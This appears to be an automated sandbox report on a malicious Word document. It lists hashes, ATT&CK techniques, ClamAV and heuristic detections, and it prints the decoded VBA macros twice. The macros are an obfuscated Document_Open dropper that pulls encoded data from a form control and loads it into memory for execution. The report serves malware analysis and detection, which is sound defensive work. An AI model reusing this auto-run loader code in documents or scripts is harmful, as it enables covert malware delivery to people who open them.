Office (OLE) malware analysis — malicious · 9ec3c86cb8d239ab

MALICIOUS

Office (OLE)

155.5 KB Created: 2016-11-01 14:32:00 Authoring application: Microsoft Office Word First seen: 2019-04-18

MD5: 58b84e7cf2836ed6e627c8f9a6a5e201 SHA-1: 719c4177fd32e82da27c208947d1e1570a9574eb SHA-256: 9ec3c86cb8d239ab40123db78a3a7c6c2e4f4afe0d39edcc7b8490e20f9869da

190 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro that utilizes GetObject to execute code. This behavior is indicative of a dropper or downloader, designed to fetch and execute additional malicious content. The ClamAV detection name 'Doc.Dropper.Agent-6590319-0' further supports this assessment.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6590319-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6590319-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

    myArray = Array("To", "CC", "From", "Subject", "Chart")
    Set wdApp = GetObject(, "Word.Application")

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro

Matched line in script

Attribute VB_Customizable = True
Private Sub Document_Open()
Dim eundum As Variant

Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC

Reference to VirtualAlloc API
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/camera-raw-settings/1.0/In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4577 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4577 bytes
SHA-256: `fe7de5dde13a6cb13a6790226c034bea235a94aac963c429b327b74732e99552`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Dim eundum As Variant Dim aristolochia As Integer ampereturn = "backbiter" blowpipe = "trebucket" geld For gallirallus = 0 To 62 hoenir = 62 singleleaf = "acadia" sexagesimal = UCase$("pI") & Left("cumnmuezzin", 4) & "us" sexagesimal = Right$("neutralizeepi", 3) & UCase$("PhYLL") & Right$("collisionum", 2) Next gallirallus End Sub Sub CreateMemo() Dim myArray() Dim wdBkmk As String Dim wdApp As Word.Application Dim wdRng As Word.Range myArray = Array("To", "CC", "From", "Subject", "Chart") Set wdApp = GetObject(, "Word.Application") Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(0)).Range wdRng.InsertBefore ("B") Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(1)).Range wdRng.InsertBefore ("T") Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(2)).Range wdRng.InsertBefore ("M") Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(3)).Range wdRng.InsertBefore ("F") Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(4)).Range ActiveSheet.ChartObjects("Chart 1").Copy wdRng.PasteAndFormat Type:=wdPasteOLEObject wdApp.Activate Set wdApp = Nothing Set wdRng = Nothing End Sub Function enterprisingly(shallot) Dim mullein As Byte Dim ankylosis As Integer Dim envenomed As Long tho envenomed, ByVal VarPtr(shallot) + 8, 4 Dim indeterminably As Variant Dim grocery As Variant Dim noscitur As Long respicere = 0 myalgia = 62 - 70 + 7 lutra = 0 baize = kidding \ 211 baize = enlarged / 229 arrastra = 16 + 116 + 3964 scalene = geopolitics(ByVal myalgia, lutra, 7390, arrastra, 64) baize = drivein + 363 tho noscitur, ByVal VarPtr(scalene) + 8, 4 singleleaf = singleleaf tho ByVal noscitur, ByVal envenomed, 5538 arrant = 79 adversative = 71 If arrant + adversative < 29 Then arrant = LCase$("BOmb") & "astica" & LCase$("lLY") singleleaf = "frankfort" forgather = LCase$("eN") & Left("grossedhamal", 7) Else enlarged = enlarged And 68 adversative = 16 End If enterprisingly = noscitur End Function Sub geld() Dim autumal As Variant Dim anorexic As String bara = copiousness.enlargement.indweller.Page2.stated.ControlTipText anesthesiologist = 7368 desperate = Right(bara, anesthesiologist) corkscreq = appeal.lip(desperate) For dynamically = 30 To 52 blowing = 52 singleleaf = "lincoln" shavian = Right$("queenlyro", 2) & Left("adwoextraordinariness", 4) & LCase$("RtHY") shavian = LCase$("Sche") & "matically" Next dynamically stabile = "counterclaim" #If VBA6 And Win64 Then Dim demigration As Variant Dim wreathy As columnea Dim cum As LongPtr wreathy.elseifstatement = 0 Dim kinesis As Integer #Else Dim basilican As Integer wreathy = 0 Dim incentive As Byte Dim cum As Long #End If leafy = 37 - 64 + 27 crosscheck = "cyprinus" regeneration = 4096 For birdseye = 47 To 60 diffusion = 60 drivein = baize \ 251 sentimentality = Mid("chuckaluckaniabatjour", 11, 3) & Left("matisslouchily", 5) & LCase$("TIC") sentimentality = Mid("unscrupulousnessrefairground", 17, 2) & Left("vivicratite", 5) & Mid("acetamideationuntie", 10, 5) Next birdseye bucolic = "sinistrous" catskills = "tuberales" philhellene = Left("inbiter", 2) & UCase$("qUiSitoRiaL") principally = 3 While principally < 8 principally = principally + 1 singleleaf = singleleaf Wend pastime = corkscreq homebuilder = "morus" cydonia = "fringed" cum = enterprisingly(pastime) bedspring = "modem" #If VBA6 And Win64 Then Dim bouillon As Variant lachrymae = "synecdoche" adding = "meralgia" masai = 107 + 55 - 10 + 1128 #ElseIf (Win32) Then teacher = "obsequiously" ornithology = "kaon" factotum = 114 + 87 + 305 masai = factotum + 3171 #End If Dim nornal As Byte Dim bailment As Long Dim accomplished As Long accomplished = 0 Dim eyeless As Long eyeless = cum + masai bougie = roar(eyeless, accomplished, accomplished) cecropia = 58 margrave = 68 If cecropia + margrave < 29 Then cecropia = Left("bepentecost", 2) & Mid("correspondingetletriceps", 14, 4) singleleaf = certificated modelled = Right$("reaffiliational", 2) & UCase$("vEoL") & UCase$("ITiS") Else singleleaf = "abstergent" margrave = 26 End If End Sub

SHA-256: fe7de5dde13a6cb13a6790226c034bea235a94aac963c429b327b74732e99552

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim eundum As Variant
Dim aristolochia As Integer
ampereturn = "backbiter"
blowpipe = "trebucket"
geld
For gallirallus = 0 To 62
hoenir = 62
singleleaf = "acadia"
sexagesimal = UCase$("pI") & Left("cumnmuezzin", 4) & "us"
sexagesimal = Right$("neutralizeepi", 3) & UCase$("PhYLL") & Right$("collisionum", 2)
Next gallirallus
End Sub
Sub CreateMemo()
    Dim myArray()
    Dim wdBkmk As String
    
    Dim wdApp As Word.Application
    Dim wdRng As Word.Range
    myArray = Array("To", "CC", "From", "Subject", "Chart")
    Set wdApp = GetObject(, "Word.Application")
    
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(0)).Range
    wdRng.InsertBefore ("B")
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(1)).Range
    wdRng.InsertBefore ("T")
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(2)).Range
    wdRng.InsertBefore ("M")
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(3)).Range
    wdRng.InsertBefore ("F")
    
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(4)).Range
    ActiveSheet.ChartObjects("Chart 1").Copy
    wdRng.PasteAndFormat Type:=wdPasteOLEObject
    
    wdApp.Activate
    
    Set wdApp = Nothing
    Set wdRng = Nothing
End Sub

Function enterprisingly(shallot)
Dim mullein As Byte
Dim ankylosis As Integer
Dim envenomed As Long
tho envenomed, ByVal VarPtr(shallot) + 8, 4
Dim indeterminably As Variant
Dim grocery As Variant
Dim noscitur As Long
respicere = 0
myalgia = 62 - 70 + 7
lutra = 0
baize = kidding \ 211

baize = enlarged / 229

arrastra = 16 + 116 + 3964
scalene = geopolitics(ByVal myalgia, lutra, 7390, arrastra, 64)
baize = drivein + 363

tho noscitur, ByVal VarPtr(scalene) + 8, 4
singleleaf = singleleaf

tho ByVal noscitur, ByVal envenomed, 5538
arrant = 79
adversative = 71
If arrant + adversative < 29 Then
arrant = LCase$("BOmb") & "astica" & LCase$("lLY")
singleleaf = "frankfort"
forgather = LCase$("eN") & Left("grossedhamal", 7)
Else
enlarged = enlarged And 68
adversative = 16
End If

enterprisingly = noscitur
End Function
Sub geld()
Dim autumal As Variant
Dim anorexic As String
bara = copiousness.enlargement.indweller.Page2.stated.ControlTipText
anesthesiologist = 7368
desperate = Right(bara, anesthesiologist)
corkscreq = appeal.lip(desperate)
For dynamically = 30 To 52
blowing = 52
singleleaf = "lincoln"
shavian = Right$("queenlyro", 2) & Left("adwoextraordinariness", 4) & LCase$("RtHY")
shavian = LCase$("Sche") & "matically"
Next dynamically

stabile = "counterclaim"
#If VBA6 And Win64 Then
Dim demigration As Variant
Dim wreathy As columnea
Dim cum As LongPtr
wreathy.elseifstatement = 0
Dim kinesis As Integer
#Else
Dim basilican As Integer
wreathy = 0
Dim incentive As Byte
Dim cum As Long
#End If
leafy = 37 - 64 + 27
crosscheck = "cyprinus"
regeneration = 4096
For birdseye = 47 To 60
diffusion = 60
drivein = baize \ 251
sentimentality = Mid("chuckaluckaniabatjour", 11, 3) & Left("matisslouchily", 5) & LCase$("TIC")
sentimentality = Mid("unscrupulousnessrefairground", 17, 2) & Left("vivicratite", 5) & Mid("acetamideationuntie", 10, 5)
Next birdseye

bucolic = "sinistrous"
catskills = "tuberales"
philhellene = Left("inbiter", 2) & UCase$("qUiSitoRiaL")
principally = 3
While principally < 8
principally = principally + 1
singleleaf = singleleaf
Wend

pastime = corkscreq
homebuilder = "morus"
cydonia = "fringed"
cum = enterprisingly(pastime)
bedspring = "modem"
#If VBA6 And Win64 Then
Dim bouillon As Variant
lachrymae = "synecdoche"
adding = "meralgia"
masai = 107 + 55 - 10 + 1128
#ElseIf (Win32) Then
teacher = "obsequiously"
ornithology = "kaon"
factotum = 114 + 87 + 305
masai = factotum + 3171

#End If
Dim nornal As Byte
Dim bailment As Long
Dim accomplished As Long
accomplished = 0
Dim eyeless As Long
eyeless = cum + masai
bougie = roar(eyeless, accomplished, accomplished)
cecropia = 58
margrave = 68
If cecropia + margrave < 29 Then
cecropia = Left("bepentecost", 2) & Mid("correspondingetletriceps", 14, 4)
singleleaf = certificated
modelled = Right$("reaffiliational", 2) & UCase$("vEoL") & UCase$("ITiS")
Else
singleleaf = "abstergent"
margrave = 26
End If

End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.